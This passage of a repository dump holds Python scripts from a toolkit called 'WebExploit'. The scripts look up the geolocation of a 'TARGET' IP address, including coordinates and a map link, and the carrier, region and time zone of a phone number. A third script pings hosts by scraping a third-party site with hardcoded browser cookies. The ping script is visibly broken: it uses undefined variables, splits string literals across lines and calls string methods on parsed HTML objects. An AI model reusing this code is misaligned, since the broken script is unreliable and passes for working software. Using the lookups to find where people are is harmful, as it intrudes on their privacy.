21 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
22 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
23 | SOFTWARE.
24 | '''
25 | mji = ''' powered by
26 | ███▄ ▄███▓ ▄▄▄██▀▀ ██
27 | ▓██▒▀█▀ ██▒ ▒██ ▒▓██
28 | ▓██ ▓██░ ░██ ░▒██
29 | ▒██ ▒██ ▓██▄██▓ ░██
30 | ▒▒██▒ ░██▒ ▓███▒ ░██
31 | ░░ ▒░ ░ ░ ▒▓▒▒░ ░▓
32 | ░░ ░ ░ ▒ ░▒░ ▒
33 | ░ ░ ░ ░ ░ ▒
34 | ░ ░ ░ ░ ░
35 | '''
36 | try:
37 | import json
38 | import time as t
39 | import sys, os
40 | from colorama import Fore as f
41 | import requests as r
42 | from random import choice
43 | from fake_headers import Headers
44 | except:
45 | print("\033[0;31m please run command \033[0;32m pip install -r requirements.txt !")
46 | t.sleep(1)
47 | sys.exit()
48 | global my_ip
49 | my_ip = "Unknown [Can't Get Your Ip]"
50 | black = "\033[0;30m"
51 | red = "\033[0;31m"
52 | green = "\033[0;32m"
53 | brown = "\033[0;33m"
54 | blue = "\033[0;34m"
55 | purple = "\033[0;35m"
56 | cyan = "\033[0;36m"
57 | l_gray = "\033[0;37m"
58 | dark_gray = "\033[1;30m"
59 | l_red = "\033[1;31m"
60 | l_green = "\033[1;32m"
61 | yellow = "\033[1;33m"
62 | l_blue = "\033[1;34m"
63 | l_purple = "\033[1;35m"
64 | l_cyan = "\033[1;36m"
65 | l_white = "\033[1;37m"
66 | faint = "\033[2m"
67 | italic = "\033[3m"
68 | underline = "\033[4m"
69 | blink = "\033[5m"
70 | nefative = "\033[7m"
71 | cross = "\033[9m"
72 | ended = "\033[0m"
73 | bold = "\033[1m"
74 | nbold = "\033[0m"
75 | white = f.WHITE
76 |
77 | bnr = ['''
78 | ▪ ▄▄▄· ▄▄▌
79 | ██ ▐█ ▄█ ██•
80 | ▐█· ██▀· ██ ▪
81 | ▐█▌ ▐█▪·• ▐█▌ ▄
82 | ▀▀▀ .▀ .▀▀▀ ''', '''
83 | ██ ██▓███ ██▓
84 | ▒▓██ ▓██░ ██ ▓██▒
85 | ░▒██ ▓██░ ██▓▒ ▒██░
86 | ░██ ▒██▄█▓▒ ▒ ▒██░
87 | ░██ ▒██▒ ░ ░ ░██████
88 | ░▓ ▒▓▒░ ░ ░ ░ ▒░▓
89 | ▒ ░▒ ░ ░ ░ ▒
90 | ▒ ░░ ░ ░
91 | ░ ░ ''']
92 |
93 | def r_bnr(bnr):
94 | return choice(bnr)
95 | print(f'{bold}')
96 | print (f'{blink}{r_bnr(bnr)}{ended}', end='')
97 | t.sleep(2)
98 | print(f' {italic}From{ended} : ', end='')
99 | #create flush text [simple]
100 | print(f'{red}{bold}', end='', flush=True)
101 | print(f'{bold}W', end='', flush=True)
102 | t.sleep(0.5)
103 | print('e', end='', flush=True)
104 | t.sleep(0.7)
105 | print('b', end='', flush=True)
106 | t.sleep(0.4)
107 | print('E', end='', flush=True)
108 | t.sleep(0.1)
109 | print('x', end='', flush=True)
110 | t.sleep(0.2)
111 | print('p', end='', flush=True)
112 | t.sleep(0.3)
113 | print('l', end='', flush=True)
114 | t.sleep(0.4)
115 | print('o', end='', flush=True)
116 | t.sleep(0.5)
117 | print('i', end='', flush=True)
118 | t.sleep(1.5)
119 | print(f't{ended}', flush=True)
120 |
121 | nbold = "\033[0m" # tahe koskholi !
122 | t.sleep(1)
123 | print(f'{white}{nbold}')
124 | try:
125 | my_ip = public = r.get("https://api.ipify.org").text
126 | except:
127 | pass
128 | print (f'\n {bold}{f.GREEN}[{f.WHITE}IPL{f.GREEN}]{f.WHITE}{f.RED} I.P.L{f.WHITE}{bold} IP{nbold} {bold}L{nbold}ocation{bold} T00L !{nbold}\n\n\n')
129 | t.sleep(3)
130 | while True:
131 | try:
132 | #my_ip = public = r.get("https://api.ipify.org").text
133 | print (f' {f.WHITE}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}IpLocation{f.WHITE}] {bold}YOUR PUBLIC IP{nbold}{f.WHITE} >>> {bold}{my_ip}{nbold}\n')
134 | t.sleep(1)
135 | #print (f' {f.WHITE}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}IpLocation{f.WHITE}] {bold}TARGET{nbold}{f.WHITE} >>> {bold}{address}{nbold}\n')
136 | t.sleep(3)
137 | address = input(f' {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}I.P.L/{bold}IPL{white}{nbold}[{bold}{green}TARGET{white}{nbold}]{nbold}{f.WHITE} enter \'\IP v4 ADDRESS{nbold}\' [ex: 5.238.12.159]:#{f.GREEN}{bold} ')
138 | print(f'{nbold}')
139 | if address:
140 | ip = address
141 | f_url = (f'http://ip-api.com/json/{ip}?fields=status,message,continent,country,countryCode,region,regionName,city,district,zip,lat,lon,timezone,offset,currency,isp,org,as,asname,reverse,mobile,proxy,hosting,query')
142 | #print (len(address))
143 | if len(address) < 7:
144 | print (f' {f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}@{f.RED}I.P.L/{f.GREEN}IP{white}] {nbold}{f.CYAN} IP IS VERY {bold}SHORT{nbold}\n')
145 | continue
146 | t.sleep(1)
147 | else:
148 | print (f' {f.WHITE}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}IpLocation{f.WHITE}] {bold}TARGET{nbold}{f.WHITE} >>> {bold}{address}{nbold}\n')
149 | t.sleep(1)
150 | break
151 | except KeyboardInterrupt:
152 | print(f'\n\n {nbold}{f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] TERMINATED BY {bold}USER{nbold} EXITTING . . .')
153 | t.sleep(2)
154 | # break
155 | sys.exit(0)
156 |
157 | t.sleep(3)
158 | print (f' {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}I.P.L/{f.CYAN}CHECKER{f.WHITE}] CHECKING IP FOR VERYFYING [{bold}{green}{address}{nbold}{white}]\n')
159 | t.sleep(2)
160 |
161 | bytes = address.split(".")
162 | for ip_byte in bytes:
163 | if int(ip_byte) < 0 or int(ip_byte) > 255:
164 | print (f' {f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}@{f.RED}I.P.L/{f.GREEN}IP{white}] {nbold}{f.CYAN} {bold}IP IS NOT VALID {bold}{red}{address}{nbold}\n')
165 | t.sleep(1)
166 | print(f'\n\n {nbold}{f.WHITE}[{f.RED}{bold}INFO{f.WHITE}{nbold}] EXITTING . . .')
167 | t.sleep(1)
168 | sys.exit()
169 | print (f' {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}I.P.L/{f.CYAN}CHECKER{f.WHITE}] {bold}IP VERIFIED {nbold}[{bold}{green}{address}{nbold}{white}]\n')
170 |
171 | #make request
172 | headers = Headers(browser='opera',os='win',headers=True).generate()
173 | response = r.get(f_url, headers=headers)
174 |
175 | response_js = response.text
176 | texts = json.loads(response_js)
177 | try:
178 | ip = texts['query']
179 | status = texts['status']
180 | continent = texts["continent"]
181 | #continentCode = texts['continentCode']
182 | country = texts['country']
183 | countryCode = texts['countryCode']
184 | region = texts['region']
185 | regionName = texts['regionName']
186 | city = texts['city']
187 | district = texts['district']
188 | zipp = texts['zip']
189 | lat = texts['lat']
190 | lon = texts['lon']
191 | timezone = texts['timezone']
192 | offset = texts['offset']
193 | currency = texts['currency']
194 | isp = texts['isp']
195 | org = texts['org']
196 | As = texts['as']
197 | except:
198 | pass
199 | #if 'as' in rjs:
200 | for results in texts:
201 |
202 | print (f'\n\n {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}STATUS{nbold}{f.WHITE} >>> {bold}{green}{bold}{status}{nbold}')
203 | t.sleep(0.5)
204 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}IP{nbold}{f.WHITE} >>> {bold}{green}{bold}{ip}{nbold}')
205 | t.sleep(0.5)
206 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}country{nbold}{f.WHITE} >>> {bold}{green}{bold}{country}{nbold}')
207 | t.sleep(0.3)
208 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}region{nbold}{f.WHITE} >>> {bold}{green}{bold}{region}{nbold}')
209 | t.sleep(0.5)
210 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}countryCode{nbold}{f.WHITE} >>> {bold}{green}{bold}{countryCode}{nbold}')
211 | t.sleep(0.5)
212 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}CONTINENT{nbold}{f.WHITE} >>> {bold}{green}{bold}{continent}{nbold}')
213 | t.sleep(0.3)
214 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}REGION-NAME{nbold}{f.WHITE} >>> {bold}{green}{bold}{regionName}{nbold}')
215 | t.sleep(0.5)
216 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}CITY{nbold}{f.WHITE} >>> {bold}{green}{bold}{city}{nbold}')
217 | t.sleep(0.5)
218 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}DISTRICT{nbold}{f.WHITE} >>> {bold}{green}{bold}{district}{nbold}')
219 | t.sleep(0.5)
220 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}ZIP{nbold}{f.WHITE} >>> {bold}{green}{bold}{zipp}{nbold}')
221 | t.sleep(0.5)
222 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}LATITUDE{nbold}{f.WHITE} >>> {bold}{green}{bold}{lat}{nbold}')
223 | t.sleep(0.5)
224 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}LONG-TITUDE{nbold}{f.WHITE} >>> {bold}{green}{bold}{lon}{nbold}')
225 | t.sleep(0.5)
226 | #print (f' {f.WHITE}[{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}zipp{nbold}{f.WHITE} >>> {green}{zipp}{nbold}\n')
227 | t.sleep(0.5)
228 | print (f' {f.WHITE}[{f.RED}{bold}WebExploit{nbold}{f.WHITE}] {white}{bold}TIME-ZONE{nbold}{f.WHITE} >>> {bold}{green}{bold}{timezone}{nbold}')
229 | t.sleep(0.5)
230 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}OFFSET{nbold}{f.WHITE} >>> {bold}{green}{bold}{offset}{nbold}')
231 | t.sleep(0.5)
232 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}CURRENCY{nbold}{f.WHITE} >>> {bold}{green}{bold}{currency}{nbold}')
233 | t.sleep(0.5)
234 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}ISP{nbold}{f.WHITE} >>> {bold}{green}{bold}{isp}{nbold}')
235 | t.sleep(0.5)
236 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}ORG{nbold}{f.WHITE} >>> {bold}{green}{bold}{org}{nbold}')
237 | t.sleep(0.5)
238 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}AS{nbold}{f.WHITE} >>> {bold}{green}{bold}{As}{nbold}')
239 | t.sleep(0.5)
240 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}GOOGLE-MAP{nbold}{f.WHITE} >>> {bold}{green}{bold}http://www.google.com/maps/place/{lat},{lon}/@{lat},{lon},16z {nbold} ')
241 | t.sleep(0.5)
242 | break
243 |
244 |
245 |
246 |
--------------------------------------------------------------------------------
/cores/ping.py:
--------------------------------------------------------------------------------
1 | def run():
2 | '''
3 | MIT License
4 |
5 | Copyright (c) 2022 MJi | DarkƤwn [github.com/c4ssif3r]
6 |
7 | Permission is hereby granted, free of charge, to any person obtaining a copy
8 | of this software and associated documentation files (the "Software"), to deal
9 | in the Software without restriction, including without limitation the rights
10 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
11 | copies of the Software, and to permit persons to whom the Software is
12 | furnished to do so, subject to the following conditions:
13 |
14 | The above copyright notice and this permission notice shall be included in all
15 | copies or substantial portions of the Software.
16 |
17 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
18 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
19 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
20 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
21 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
22 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
23 | SOFTWARE.
24 | '''
25 | try:
26 | import time as t
27 | from colorama import Fore as f
28 | import sys, os
29 | from random import choice
30 | from bs4 import BeautifulSoup as bs
31 | import json
32 | import requests as r
33 | #r = requests.Session()
34 | except:
35 | print("\033[0;31m please run command \033[0;32m pip install -r requirements.txt !")
36 | t.sleep(1)
37 | sys.exit()
38 |
39 | black = "\033[0;30m"
40 | red = "\033[0;31m"
41 | green = "\033[0;32m"
42 | brown = "\033[0;33m"
43 | blue = "\033[0;34m"
44 | purple = "\033[0;35m"
45 | cyan = "\033[0;36m"
46 | l_gray = "\033[0;37m"
47 | dark_gray = "\033[1;30m"
48 | l_red = "\033[1;31m"
49 | l_green = "\033[1;32m"
50 | yellow = "\033[1;33m"
51 | l_blue = "\033[1;34m"
52 | l_purple = "\033[1;35m"
53 | l_cyan = "\033[1;36m"
54 | l_white = "\033[1;37m"
55 | faint = "\033[2m"
56 | italic = "\033[3m"
57 | underline = "\033[4m"
58 | blink = "\033[5m"
59 | nefative = "\033[7m"
60 | cross = "\033[9m"
61 | ended = "\033[0m"
62 | bold = "\033[1m"
63 | nbold = "\033[0m"
64 | white = f.WHITE
65 |
66 | bnr = ['''
67 | ▄████▄ █████ ▄▄▄▄
68 | ▒██▀ ▀█ ▓██ ▓█████▄
69 | ▒▓█ ▄ ▒████ ▒██▒ ▄██
70 | ▒▓▓▄ ▄██ ░▓█▒ ▒██░█▀
71 | ▒ ▓███▀ ▒░▒█░ ▒░▓█ ▀█▓
72 | ░ ░▒ ▒ ░ ▒ ░ ░░▒▓███▀▒
73 | ░ ▒ ░ ░ ░▒░▒ ░
74 | ░ ░ ░ ░ ░
75 | ░ ░ ░ ░ ░ ''', '''
76 | ▄▄· ·▄▄▄ ▄▄▄▄·
77 | ▐█ ▌▪ █ · ▐█ ▀█▪
78 | ██ ▄▄ █▀▀▪ ▐█▀▀█▄
79 | ▐███▌ ██ . ██▄▪▐█
80 | ·▀▀▀ ▀▀▀ ·▀▀▀▀ ''']
81 |
82 | def r_bnr(bnr):
83 | return choice(bnr)
84 |
85 | print (f'{blink}{r_bnr(bnr)}{ended}', end='')
86 | t.sleep(2)
87 | print(f' {italic}From{ended} : ', end='')
88 | #create flush text [simple]
89 | print(f'{red}{bold}', end='', flush=True)
90 | print(f'{bold}W', end='', flush=True)
91 | t.sleep(0.5)
92 | print('e', end='', flush=True)
93 | t.sleep(0.7)
94 | print('b', end='', flush=True)
95 | t.sleep(0.4)
96 | print('E', end='', flush=True)
97 | t.sleep(0.1)
98 | print('x', end='', flush=True)
99 | t.sleep(0.2)
100 | print('p', end='', flush=True)
101 | t.sleep(0.3)
102 | print('l', end='', flush=True)
103 | t.sleep(0.4)
104 | print('o', end='', flush=True)
105 | t.sleep(0.5)
106 | print('i', end='', flush=True)
107 | t.sleep(1.5)
108 | print(f't{ended}', flush=True)
109 | nbold = "\033[0m" # tahe koskholi !
110 | t.sleep(1)
111 | ping = 'https://www.broadbandsearch.net/network-tools/ping'
112 | print(f'{white}{nbold}')
113 |
114 | print (f'\n {bold}{f.GREEN}[{f.WHITE}P.I.N.G-online{f.GREEN}]{f.WHITE}{f.RED} P.I.N.G{f.WHITE}{bold} ONLINE PING TOOL {nbold} T00L !\n\n\n')
115 | t.sleep(3)
116 |
117 |
118 | while True:
119 | try:
120 | url = input(f' {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}P.I.N.G/{bold}URL{nbold}{f.WHITE} enter \'{bold}URL or IP{nbold}\' [ex: youtube.com | 1.1.1.1]:#{f.GREEN}{bold} ')
121 | print(f'{nbold}')
122 |
123 | if url:
124 | if 'http' not in url:
125 | break
126 | if 'https://' not in url:
127 | break
128 | else:
129 | print(f'\n {nbold}{f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] ENTER URL WITHOUT {bold}HTTP:// OR HTTPS://{nbold} TRY AGAIN . . .\n')
130 | t.sleep(1)
131 | continue
132 | else:
133 | continue
134 | except KeyboardInterrupt:
135 | print(f'\n\n {nbold}{f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] TERMINATED BY {bold}USER{nbold} EXITTING . . .')
136 | t.sleep(2)
137 | # break
138 | sys.exit(0)
139 | finally:
140 | print (f' {f.WHITE}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.CYAN}PING/{f.WHITE}URL >>>{bold}{f.CYAN} {url} {nbold}{f.WHITE}] \n')
141 | print (f' {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}PING/{f.CYAN}STATUS{f.WHITE}] Try Requesting . . . {bold}{f.YELLOW} Please Wait{nbold} . . .\n')
142 | t.sleep(2)
143 | d = 'domain=$'
144 | data = d.replace('$',url)
145 | #data = {'domain':'1.1.1.1'}
146 |
147 | hed = {'Host': 'www.broadbandsearch.net',
148 | 'User-Agent': 'Mozilla/5.0 (X11; Linux aarch64; rv:91.0) Gecko/20100101 Firefox/91.0',
149 | 'Accept': '*/*',
150 | 'Accept-Language': 'en-US,en;q=0.5',
151 | 'Accept-Encoding': 'gzip, deflate, br',
152 | 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
153 | 'X-Requested-With': 'XMLHttpRequest',
154 | 'Content-Length': '16',
155 | 'Origin': 'https://www.broadbandsearch.net',
156 | 'Connection': 'keep-alive',
157 | 'Cookie': '_ga_F8CJ2KC6JR=GS1.1.1673472546.1.1.1673472850.0.0.0; _ga=GA1.2.638612145.1673472546; __gads=ID=6f95f94f84659bb4-22c69e6f4cd8002f:T=1673472550:RT=1673472550:S=ALNI_MaoiRZ2kMjsMTDYg7KJlYKFQ0UEyQ; __gpi=UID=00000bbff5daf570:T=1673472550:RT=1673472550:S=ALNI_MZ84xWSr3jUcf5vm7IqTGX4F7IhAQ; _gid=GA1.2.2145156682.1673472547',
158 | 'Sec-Fetch-Dest': 'empty',
159 | 'Sec-Fetch-Mode': 'cors',
160 | 'Sec-Fetch-Site': 'same-origin'}
161 |
162 | while True:
163 | try:
164 | ping_data = r.post(ping, headers=hed, data=data)
165 | if ping_data:
166 | break
167 | else:
168 | continue
169 | except Exception as error:
170 | print (f' {nbold}{f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}@{f.RED}PING/{f.GREEN}REQUEST-ERROR{white}] {nbold}{f.RED} ERROR :{white}\'{red}{bold}{error}{nbold}\' | Requesting Again . . . \n')
171 | continue
172 | except KeyboardInterrupt:
173 | print(f'\n\n {nbold}{f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] TERMINATED BY {bold}USER{nbold} EXITTING . . .')
174 | t.sleep(2)
175 | # break
176 | sys.exit(0)
177 |
178 |
179 |
180 | data_text = ping_data.text
181 | #ping_ = data_text.replace('
', '\n')
182 |
183 |
184 |
185 | da = bs(data_text, 'html.parser')
186 |
187 | data = bs(data_text, 'html.parser')
188 | print(da)
189 | test, status = data.find_all('p')
190 | d = ''
191 | d = da.replace('
','\n')
192 | dd = d.replace('','\t\t\n')
193 | ddd = dd.replace('
','\t\t\n')
194 | dddd = dddd.replace('
','\t\t\n')
195 | print(dddd)
196 |
197 |
198 | data_json = json.loads(dddd)
199 | final = data_json['data']
200 |
201 | t.sleep(1)
202 |
203 | test = test.text
204 | status = status.text
205 |
206 |
207 |
208 | print (f' {f.WHITE}[{f.WHITE}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}PING/{f.WHITE}STATUS >>>{bold}{f.GREEN} {status} {nbold}{f.WHITE}] \n\n')
209 | t.sleep(3)
210 | print (f' {f.WHITE}[{f.WHITE}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}PING/{f.WHITE}STATUS: {bold}{f.BLUE} {final} {nbold}{f.WHITE}] \n\n')
211 | t.sleep(2)
212 | print (f' {f.WHITE}[{f.WHITE}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}PING/{f.WHITE}STATUS >>>{bold}{f.CYAN} {test} {nbold}{f.WHITE}]\n')
213 |
214 |
215 |
216 |
217 |
218 |
219 |
220 |
--------------------------------------------------------------------------------
/cores/pnt.py:
--------------------------------------------------------------------------------
1 |
2 | def run():
3 | '''
4 | 'MJI 3> M'
5 | _____________
6 | MIT License
7 |
8 | Copyright (c) 2022 MJi | DarkƤwn [github.com/c4ssif3r]
9 |
10 | Permission is hereby granted, free of charge, to any person obtaining a copy
11 | of this software and associated documentation files (the "Software"), to deal
12 | in the Software without restriction, including without limitation the rights
13 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
14 | copies of the Software, and to permit persons to whom the Software is
15 | furnished to do so, subject to the following conditions:
16 |
17 | The above copyright notice and this permission notice shall be included in all
18 | copies or substantial portions of the Software.
19 |
20 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
21 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
22 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
23 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
24 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
25 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
26 | SOFTWARE.
27 | '''
28 | from sys import argv, exit
29 | import time as t
30 | from colorama import Fore as f
31 | from random import choice
32 | import phonenumbers
33 | from phonenumbers import carrier, geocoder, timezone
34 |
35 | black = "\033[0;30m"
36 | red = "\033[0;31m"
37 | green = "\033[0;32m"
38 | brown = "\033[0;33m"
39 | blue = "\033[0;34m"
40 | purple = "\033[0;35m"
41 | cyan = "\033[0;36m"
42 | l_gray = "\033[0;37m"
43 | dark_gray = "\033[1;30m"
44 | l_red = "\033[1;31m"
45 | l_green = "\033[1;32m"
46 | yellow = "\033[1;33m"
47 | l_blue = "\033[1;34m"
48 | l_purple = "\033[1;35m"
49 | l_cyan = "\033[1;36m"
50 | l_white = "\033[1;37m"
51 | faint = "\033[2m"
52 | italic = "\033[3m"
53 | underline = "\033[4m"
54 | blink = "\033[5m"
55 | nefative = "\033[7m"
56 | cross = "\033[9m"
57 | ended = "\033[0m"
58 | bold = "\033[1m"
59 | nbold = "\033[0m"
60 | white = f.WHITE
61 | bnr = [""]
62 | def r_bnr(bnr):
63 | return choice(bnr)
64 | print(f'{bold}')
65 | print (f'{blink}{r_bnr(bnr)}{ended}', end='')
66 | t.sleep(2)
67 | print(f' {italic}From{ended} : ', end='')
68 | print(f'{red}{bold}', end='', flush=True)
69 | #create flush text [simple]
70 | print(f'{bold}W', end='', flush=True)
71 | t.sleep(0.5)
72 | print('e', end='', flush=True)
73 | t.sleep(0.7)
74 | print('b', end='', flush=True)
75 | t.sleep(0.4)
76 | print('E', end='', flush=True)
77 | t.sleep(0.1)
78 | print('x', end='', flush=True)
79 | t.sleep(0.2)
80 | print('p', end='', flush=True)
81 | t.sleep(0.3)
82 | print('l', end='', flush=True)
83 | t.sleep(0.4)
84 | print('o', end='', flush=True)
85 | t.sleep(0.5)
86 | print('i', end='', flush=True)
87 | t.sleep(1.5)
88 | print(f't{ended}', flush=True)
89 | nbold = "\033[0m" # tahe koskholi !
90 | t.sleep(1)
91 | print (f'\n {bold}{f.GREEN}[{f.WHITE}PLT{f.GREEN}]{f.WHITE}{f.RED} P.L.T{f.WHITE}{bold} P{nbold}honeNnumber{nbold}L{bold}ocation{bold} T{nbold}racker{nbold}\n\n\n')
92 | t.sleep(3)
93 |
94 | phoneNumber : str = input(f' {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}P.N.T/{bold}Phonenumber-Location-Tracker{nbold}{f.WHITE} enter \'PHONE-{bold}NUMBER{nbold}\' | (ex: +447387384578):#{f.GREEN}{bold} ')
95 | Region : str = input(f' {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}P.N.T/{bold}Region-{bold}NUMBER{nbold}\' | (ex: IR, US, IN, or ....):#{f.GREEN}{bold} ')
96 | Number : str = phonenumbers.parse(phoneNumber, Region)
97 | regionCode : str = phonenumbers.region_code_for_number(Number)
98 | provider : str = carrier.name_for_number(Number, "en")
99 | loc : str = geocoder.description_for_number(Number, "id")
100 | isValid : str = phonenumbers.is_valid_number(Number)
101 | isPossible : str = phonenumbers.is_possible_number(Number)
102 | formattedNum : str = phonenumbers.format_number(Number, phonenumbers.PhoneNumberFormat.INTERNATIONAL)
103 | formattedNumMobile : str = phonenumbers.format_number_for_mobile_dialing(Number, Region,with_formatting=True)
104 | numberType : str = phonenumbers.number_type(Number)
105 | timezone1 : str = timezone.time_zones_for_number(Number)
106 | timezoneM : str = ', '.join(timezone1)
107 |
108 | def phoneDetector() -> str:
109 | if numberType == phonenumbers.PhoneNumberType.MOBILE:
110 | return "mobile number"
111 | elif numberType == phonenumbers.PhoneNumberType.FIXED_LINE:
112 | return "fixed line number"
113 | else:
114 | return "another type of number"
115 |
116 |
117 | print (f'\n\n {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}Location{nbold}{f.WHITE} >>> {bold}{green}{bold}{loc}{nbold}')
118 | t.sleep(0.5)
119 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}RegionCode{nbold}{f.WHITE} >>> {bold}{green}{bold}{regionCode}{nbold}')
120 | t.sleep(0.5)
121 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}TimeZone{nbold}{f.WHITE} >>> {bold}{green}{bold}{timezoneM}{nbold}')
122 | t.sleep(0.3)
123 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}Operator{nbold}{f.WHITE} >>> {bold}{green}{bold}{provider}{nbold}')
124 | t.sleep(0.5)
125 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}ValidNumber{nbold}{f.WHITE} >>> {bold}{green}{bold}{isValid}{nbold}')
126 | t.sleep(0.5)
127 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}PossibleNumber{nbold}{f.WHITE} >>> {bold}{green}{bold}{isPossible}{nbold}')
128 | t.sleep(0.3)
129 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}internationalFormat{nbold}{f.WHITE} >>> {bold}{green}{bold}{formattedNum}{nbold}')
130 | t.sleep(0.5)
131 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}MobileFormat{nbold}{f.WHITE} >>> {bold}{green}{bold}{formattedNumMobile}{nbold}')
132 | t.sleep(0.5)
133 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}originalNumber{nbold}{f.WHITE} >>> {bold}{green}{bold}{numberType}{nbold}')
134 | t.sleep(0.5)
135 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}numberFormat{nbold}{f.WHITE} >>> {bold}{green}{bold}{phoneDetector()}{nbold}')
136 | t.sleep(0.5)
137 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}E.164-Format{nbold}{f.WHITE} >>> {bold}{green}{bold}{phonenumbers.format_number(Number, phonenumbers.PhoneNumberFormat.E164)}{nbold}')
138 | t.sleep(0.5)
139 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}countryCode{nbold}{f.WHITE} >>> {bold}{green}{bold}{Number.country_code}{nbold}')
140 | t.sleep(0.5)
141 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}nationalNumber{nbold}{f.WHITE} >>> {bold}{green}{bold}{Number.national_number}{nbold}')
142 | t.sleep(0.5)
143 | # location on google map incoming ....
--------------------------------------------------------------------------------
/cores/rarc.py:
--------------------------------------------------------------------------------
1 | def run():
2 | '''
3 | MIT License
4 |
5 | Copyright (c) 2022 MJi | DarkƤwn [github.com/c4ssif3r]
6 |
